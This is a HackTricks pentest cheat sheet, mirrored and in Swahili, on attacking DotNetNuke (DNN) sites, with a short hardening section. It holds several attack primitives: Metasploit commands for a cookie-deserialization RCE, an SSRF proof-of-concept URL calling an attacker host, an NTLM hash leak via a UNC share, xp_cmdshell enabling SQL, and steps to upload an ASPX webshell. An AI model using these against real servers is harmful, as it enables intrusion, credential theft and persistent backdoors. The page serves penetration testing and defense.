mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
96 lines
4.7 KiB
Markdown
96 lines
4.7 KiB
Markdown
# DotNetNuke (DNN)
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
## DotNetNuke (DNN)
|
||
|
||
Ikiwa unaingia kama **administrator** katika DNN ni rahisi kupata **RCE**, hata hivyo mbinu kadhaa za *unauthenticated* na *post-auth* zimechapishwa katika miaka michache iliyopita. Cheat-sheet ifuatayo inakusanya primitives muhimu zaidi kwa kazi za mashambulizi na za kujihami.
|
||
|
||
---
|
||
## Tathmini ya Toleo na Mazingira
|
||
|
||
* Angalia kichwa cha jibu cha HTTP *X-DNN* – kwa kawaida kinadhihirisha toleo halisi la jukwaa.
|
||
* Mchawi wa usakinishaji unavuja toleo katika `/Install/Install.aspx?mode=install` (inapatikana kwenye usakinishaji wa zamani sana).
|
||
* `/API/PersonaBar/GetStatus` (9.x) inarudisha blob ya JSON inayojumuisha `"dnnVersion"` kwa watumiaji wenye haki za chini.
|
||
* Keki za kawaida utakazoziona kwenye mfano wa moja kwa moja:
|
||
* `.DOTNETNUKE` – tiketi ya uthibitishaji wa fomu za ASP.NET.
|
||
* `DNNPersonalization` – ina data ya profaili ya mtumiaji ya XML/serialized (toleo za zamani – angalia RCE hapa chini).
|
||
|
||
---
|
||
## Utekelezaji Usio na Uthibitisho
|
||
|
||
### 1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups)
|
||
*Toleo lililoathiriwa ≤ 9.3.0-RC*
|
||
|
||
`DNNPersonalization` inachambuliwa kwenye kila ombi wakati mpangilio wa 404 wa ndani umewezeshwa. XML iliyoundwa inaweza hivyo kusababisha mnyororo wa vifaa vya kiholela na utekelezaji wa msimbo.
|
||
```
|
||
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
|
||
msf> set RHOSTS <target>
|
||
msf> set LHOST <attacker_ip>
|
||
msf> run
|
||
```
|
||
Moduli inachagua kiotomatiki njia sahihi kwa toleo zilizorekebishwa lakini bado zina udhaifu (CVE-2018-15811/15812/18325/18326). Utekelezaji unafanya kazi **bila uthibitisho** kwenye 7.x–9.1.x na kwa akaunti ya *imehakikishwa* ya chini ya haki kwenye 9.2.x+.
|
||
|
||
### 2. Server-Side Request Forgery (CVE-2025-32372)
|
||
*Toleo zilizoathirika < 9.13.8 – Patch iliyotolewa Aprili 2025*
|
||
|
||
Kupita kwa suluhisho la zamani la `DnnImageHandler` kunamwezesha mshambuliaji kulazimisha seva kutoa **maombi ya GET yasiyo na mipaka** (semi-blind SSRF). Athari za vitendo:
|
||
|
||
* Skana ya bandari za ndani / ugunduzi wa huduma za metadata katika matumizi ya wingu.
|
||
* Fikia mwenyeji ambao vinginevyo vimefungwa kutoka kwa Mtandao.
|
||
|
||
Uthibitisho wa dhana (badilisha `TARGET` & `ATTACKER`):
|
||
```
|
||
https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
|
||
```
|
||
The request is triggered in the background; monitor your listener for callbacks.
|
||
|
||
### 3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)
|
||
*Toleo lililoathiriwa 6.0.0 – 9.x (< 10.0.1)*
|
||
|
||
Maudhui yaliyoundwa kwa njia maalum yanaweza kufanya DNN ijitahidi kupata rasilimali kwa kutumia **UNC path** kama `\\attacker\share\img.png`. Windows itafanya mazungumzo ya NTLM kwa furaha, ikivuja hash za akaunti ya seva kwa mshambuliaji. Pandisha toleo hadi **10.0.1** au zima SMB ya nje kwenye firewall.
|
||
|
||
### 4. IP Filter Bypass (CVE-2025-52487)
|
||
Ikiwa wasimamizi wanategemea *Host/IP Filters* kwa ulinzi wa lango la admin, fahamu kwamba toleo la kabla ya **10.0.1** linaweza kupitishwa kwa kubadilisha `X-Forwarded-For` katika hali ya reverse-proxy.
|
||
|
||
---
|
||
## Post-Authentication to RCE
|
||
|
||
### Via SQL console
|
||
Chini ya **`Settings → SQL`** dirisha la swali lililojengwa ndani linaruhusu utekelezaji dhidi ya hifadhidata ya tovuti. Kwenye Microsoft SQL Server unaweza kuwezesha **`xp_cmdshell`** na kuanzisha amri:
|
||
```sql
|
||
EXEC sp_configure 'show advanced options', 1;
|
||
RECONFIGURE;
|
||
EXEC sp_configure 'xp_cmdshell', 1;
|
||
RECONFIGURE;
|
||
GO
|
||
xp_cmdshell 'whoami';
|
||
```
|
||
### Kupakia webshell ya ASPX
|
||
1. Nenda kwenye **`Settings → Security → More → More Security Settings`**.
|
||
2. Ongeza `aspx` (au `asp`) kwenye **Allowable File Extensions** na **Save**.
|
||
3. Tembelea **`/admin/file-management`** na upakie `shell.aspx`.
|
||
4. Ianzishe kwenye **`/Portals/0/shell.aspx`**.
|
||
|
||
---
|
||
## Kuinua Haki kwenye Windows
|
||
Mara tu utekelezaji wa msimbo unapoanzishwa kama **IIS AppPool\<Site>**, mbinu za kawaida za kuinua haki za Windows zinatumika. Ikiwa sanduku lina udhaifu unaweza kutumia:
|
||
|
||
* **PrintSpoofer** / **SpoolFool** kutumia *SeImpersonatePrivilege*.
|
||
* **Juicy/Sharp Potatoes** kutoroka *Service Accounts*.
|
||
|
||
---
|
||
## Mapendekezo ya Kuimarisha (Blue Team)
|
||
|
||
* **Sasisha** angalau **9.13.9** (inasahihisha SSRF bypass) au bora zaidi **10.0.1** (masuala ya IP filter & NTLM).
|
||
* Ondoa faili za ziada **`InstallWizard.aspx*`** baada ya usakinishaji.
|
||
* Zima SMB ya nje (bandari 445/139) egress.
|
||
* Lazimisha *Host Filters* kali kwenye proxy ya ukingo badala ya ndani ya DNN.
|
||
* Zuia ufikiaji wa `/API/RemoteContentProxy` ikiwa haijatumika.
|
||
|
||
## Marejeleo
|
||
|
||
* Metasploit `dnn_cookie_deserialization_rce` moduli ya hati – maelezo ya vitendo ya RCE isiyo na uthibitisho (GitHub).
|
||
* GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF bypass & taarifa za patch.
|
||
{{#include ../../banners/hacktricks-training.md}}
|